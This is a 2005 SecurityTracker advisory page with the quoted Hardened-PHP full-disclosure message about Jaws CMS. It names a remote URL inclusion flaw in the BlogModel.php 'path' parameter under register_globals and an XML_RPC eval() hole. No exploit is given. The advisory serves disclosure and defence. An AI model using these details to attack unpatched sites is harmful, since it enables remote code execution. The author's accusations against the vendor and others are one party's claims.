Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   Jaws Vendors:
Jaws 'BlogModel.php' Include File Bug Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014395
SecurityTracker URL:
CVE Reference:   CVE-2005-2179   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Jul 6 2005
Impact:   Execution of arbitrary code via network, User access via network
Vendor Confirmed:  Yes  
Version(s): 0.5.2 and prior versions
Description:   An include file vulnerability was reported in Jaws. A remote user can execute arbitrary commands on the target system.

The 'BlogModel.php' script does not properly validate user-supplied input in the 'path' parameter. If 'register_globals' is set to 'on' in the 'php.ini' configuration file, then a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The vendor was notified on July 5, 2005.

Stefan Esser of the Hardened-PHP Project reported this vulnerability.

The original advisory is available at:

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  [Full-disclosure] Advisory 07/2005: Jaws Multiple Remote Code

Hash: SHA1

                        Hardened-PHP Project

                      -= Security  Advisory =-

     Advisory: Jaws Multiple Remote Code Execution Vulnerabilities
 Release Date: 2005/07/06
Last Modified: 2005/07/06
       Author: Stefan Esser []

  Application: Jaws <= 0.5.2
     Severity: Multiple Security Holes in Jaws allow remote code
         Risk: Critical
Vendor Status: Vendor doesn't consider this serious enough


   Quote from
   "Jaws is a Framework and Content Management System for building 
   dynamic web sites. It aims to be User Friendly giving ease of use 
   and lots of ways to customize web sites, but at the same time is 
   Developer Frendly, it offers a simple and powerful framework to 
   hack your own modules."
   An audit of Jaws revealed that it uses XML_RPC and is therefore
   vulnerable to the known eval() hole. Additionally the Blog gadget
   is vulnerable to a remote URL inclusion vulnerability.
   The vendor, although we contacted him credits Gulftech for the
   XML_RPC vulnerability. He also believes, that a remote URL inclusion
   vulnerability that is only exploitable with register_globals
   turned on, which is the default on most servers, is not serious.
   Because of this they released an updated version of Jaws, that
   is still vulnerable to remote code execution through the Blog


   A quick audit of Jaws revealed, that they are using the XMLRPC
   library. This audit also revealed that the file BlogModel.php
   of the Blog gadget suffers a remote URL include vulnerability 
   triggered by the global variable 'path'.
   Unfortunately for the users of Jaws, the vendor believes that
   a remote URL inclusion vulnerability is not serious and 
   therefore they released an update to Jaws in response to our
   notification, that only upgrades the bundled XMLRPC library.
   This means, although they know better the Jaws developers
   expose their user to a serious security hole in their Blog
   Impudent like they are, they are also crediting the XMLRPC
   finding to Gulftech, although we contacted them. But this is 
   not uncommon. Secunia and some Linux vendors still claim, that
   Gulftech has informed the PEAR developers about this
   vulnerability, which is of course a lie.

Proof of Concept:

   The Hardened-PHP Project is not going to release an exploit 
   for this vulnerability to the public.

Disclosure Timeline:

   05. July 2005 - Contacted jaws vendor via email
   05. July 2005 - Vendor releases Jaws 0.5.2 which only upgrades
                   the bundled XML_RPC
   06. July 2005 - Public disclosure


   Because there is actually no fix for this vulnerability we
   recommend that you simply do not use Jaws at all. Code that does
   require register_globals turned off to be secure should be 
   Alternatively you can simply install the Hardening-Patch to 
   stop this and all other remote URL include vulnerabilities.


   pub  1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
   Key fingerprint = 066F A6D0 E57E 9936 9082  7E52 4439 14CC 0A86 4AA1

Copyright 2005 Stefan Esser. All rights reserved.

Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see


Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, LLC